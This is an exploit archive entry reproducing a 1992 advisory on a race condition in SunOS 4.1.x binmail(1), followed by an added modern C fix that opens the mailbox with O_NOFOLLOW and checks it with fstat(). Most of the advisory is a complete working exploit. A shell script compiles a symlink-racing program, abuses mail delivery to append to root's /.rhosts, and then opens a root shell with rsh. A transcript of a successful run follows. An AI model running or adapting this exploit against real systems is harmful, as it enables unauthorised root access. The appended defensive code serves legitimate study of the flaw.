sunhack.sh

17 Aug 1999, reported by Packet Storm (packetstormsecurity.com)

Race condition in binmail(1) allows users to gain root access on SunOS systems.

Code
```
===========================================================================
[8lgm]-Advisory-5.UNIX.mail.24-Jan-1992


PROGRAM:

binmail(1) (/usr/bin/mail)

VULNERABLE OS's:

SunOS 4.1.x

(Possibly other platforms - see DISCUSSION)

DESCRIPTION:

A race condition exists in binmail(1), which allows files to
be created in arbitrary places on the filesystem. These files
can be owned by arbitrary (usually system) users.

IMPACT:

Any user with access to binmail(1) can become root.

REPEAT BY:

This example demonstrates how to become root on most affected
machines by creating/appending-to root's .rhosts file. Please
do not do this unless you have permission.

Create the following file, 'mailscript':

8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# Syntax: mailscript user target-file rsh-user
#
# This exploits a flaw in SunOS binmail(1), and attempts
# to become the specified 'user', by creating a .rhosts
# file and using rsh.
#
# Written 1992 by [8LGM]
# Please do not use this script without permission.
#
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS

PROG="`basename $0`"
SPOOLDIR="/var/spool/mail"

# Check args
if [ $# -ne 3 ]; then
    echo "Syntax: $PROG user target-file rsh-user"
    exit 1
fi
TARGET="$1"
TARGET_FILE="$2"
RSH_USER="$3"

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
    echo "Sorry, this only works on SunOS"
    exit 1
fi

# Check user exists
grep "^$TARGET:" /etc/passwd >/dev/null 2>&1
if [ $? -ne 0 ]; then
    echo "$PROG: Warning, $TARGET not in local passwd file"
    # We continue though, might be in the YP passwd file
fi

# Check target file
if [ -f $TARGET_FILE ]; then
    OLD_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null
    echo "$PROG: Warning, $TARGET_FILE already exists, appending"
else
    OLD_TARGET_LEN=0
fi

# Delete spool file if its a link, and we are able
if [ -h "$SPOOLDIR/$TARGET" ]; then
    rm -f "$SPOOLDIR/$TARGET"
    # Dont worry about errors, we catch it below
fi

# Check mail file
if [ -f "$SPOOLDIR/$TARGET" ]; then
    echo "$PROG: ${TARGET}'s mail file exists."
    exit 1
fi

# Make the race program
cat >mailrace.c << 'EOF'
#include <stdio.h>

main(argc,argv)
int argc;
char *argv[];
{
    if (argc != 3) {
        fprintf(stderr, "Usage: %s mailfile newfile\n", argv[0]);
        exit(1);
    }

    for (;;) {
        unlink(argv[1]);
        symlink(argv[2], argv[1]);
    }
}
EOF
cc -o mailrace mailrace.c

# Check we now have mailrace
if [ ! -x "mailrace" ]; then
    echo "$PROG: couldnt compile mailrace.c - check it out"
    exit 1
fi

# Start mailrace
./mailrace $SPOOLDIR/$TARGET $TARGET_FILE &
RACE_PID=$!

# Send mail to the user
NEW_TARGET_LEN=$OLD_TARGET_LEN
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
    echo "Sending mail to $TARGET"
    echo "localhost $USER" | /bin/mail $TARGET
    sleep 10
    kill -STOP $RACE_PID
    rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1
    if [ -f $SPOOLDIR/$TARGET ]; then
        echo "$PROG: Sorry, we lost the race - cant try again."
        kill -9 $RACE_PID
        exit 1
    fi
    kill -CONT $RACE_PID
    if [ -f "$TARGET_FILE" ]; then
        NEW_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null
    else
        NEW_TARGET_LEN=0
    fi
    if [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; then
        echo "We drew the race that time, trying again"
    fi
done

# We won the race
kill -9 $RACE_PID
echo "We won the race, becoming $RSH_USER"
rsh localhost -l $RSH_USER sh -i
exit 0
8<--------------------------- cut here ----------------------------

(Lines marked with > represent user input)

Check what root users are on the system:

> % grep :0: /etc/passwd
root:*:0:1:Operator:/:/bin/csh
sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
+::0:0:::

We choose a user with UID 0, but without a /var/spool/mail/<username> file:

> % ls -l /var/spool/mail/sysdiag
/var/spool/mail/sysdiag not found

Execute mailscript. The user is sysdiag, the target file is /.rhosts, and
the user to rsh to on success is root:

> % chmod 700 mailscript
> % ./mailscript sysdiag /.rhosts root
mailscript: Warning, /.rhosts already exists, appending
Sending mail to sysdiag
We won the race, becoming root
./mailscript: 11051 Killed
#
```
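The delivery-agent side of the fix, as an added example in modern C that is not part of the advisory: open the spool file with O_NOFOLLOW and validate the descriptor with fstat() instead of checking the name first, so the unlink()/symlink() loop in mailrace.c has nothing to win. O_NOFOLLOW is POSIX.1-2008 and did not exist on SunOS 4.1.x; the mailbox names and the temporary spool directory in the demo are constructed, not taken from the advisory.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open (creating if absent) the spool file at `path` without following a
 * symlink and without a stat()-then-open() window. An existing file must be
 * a regular, singly linked file owned by `owner`. Returns an fd, or -1. */
int open_mailbox_nofollow(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW makes a planted symlink fail with ELOOP instead of being
     * dereferenced, which is exactly the step binmail(1) got wrong. */
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    /* Validate the object we actually hold, not the name we looked up. */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario (hypothetical paths): a temporary spool directory
 * holding a genuine mailbox "alice" and a symlink "sysdiag" that points at
 * another file. Returns 1 if the mailbox opens and the symlink is refused. */
int demo_symlink_rejected(void)
{
    char dir[] = "/tmp/spoolXXXXXX", box[64], lnk[64], victim[64];
    int fd, ok;
    if (!mkdtemp(dir)) return 0;
    snprintf(box, sizeof box, "%s/alice", dir);
    snprintf(lnk, sizeof lnk, "%s/sysdiag", dir);
    snprintf(victim, sizeof victim, "%s/dot-rhosts", dir);
    if ((fd = open(box, O_WRONLY | O_CREAT, 0600)) >= 0) close(fd);
    if ((fd = open(victim, O_WRONLY | O_CREAT, 0600)) >= 0) close(fd);
    symlink(victim, lnk);               /* the planted link */
    fd = open_mailbox_nofollow(box, getuid());
    ok = fd >= 0;
    if (fd >= 0) close(fd);
    fd = open_mailbox_nofollow(lnk, getuid());
    ok = ok && fd < 0 && errno == ELOOP;
    unlink(lnk); unlink(victim); unlink(box); rmdir(dir);
    return ok;
}
```

The same fstat() checks also catch a hard link planted in the spool directory, since a freshly created mailbox has a link count of one and is owned by the recipient.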
